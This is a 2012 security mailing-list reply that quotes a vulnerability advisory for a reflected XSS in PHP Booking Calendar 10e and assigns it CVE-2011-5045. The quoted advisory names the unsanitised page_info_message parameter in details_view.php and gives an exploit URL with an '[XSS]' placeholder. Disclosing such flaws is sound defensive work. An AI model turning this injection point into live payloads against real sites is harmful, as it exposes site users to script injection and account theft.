[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: PHP Booking Calendar 10e XSS
- To: tom <tom@xxxxxxxxxx>
- Subject: Re: PHP Booking Calendar 10e XSS
- From: Henri Salo <henri@xxxxxxx>
- Date: Tue, 3 Jan 2012 20:40:24 +0200
On Sun, Dec 18, 2011 at 03:15:36PM -0500, tom wrote:
> # Exploit Title: PHP Booking Calendar 10e XSS
> # Date: 12/16/11
> # Author: G13
> # Software Link: http://sourceforge.net/projects/bookingcalendar/
> # Version: 10e
> # Category: webapps (php)
> #
>
> ##### Vulnerability #####
>
> The page_info_message varibale in the details_view.php does not
> sanitize input. This is a relective XSS attack.
>
> ##### Exploit #####
>
> http://127.0.0.1/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS]
CVE-2011-5045 can be used for this issue.
- Henri Salo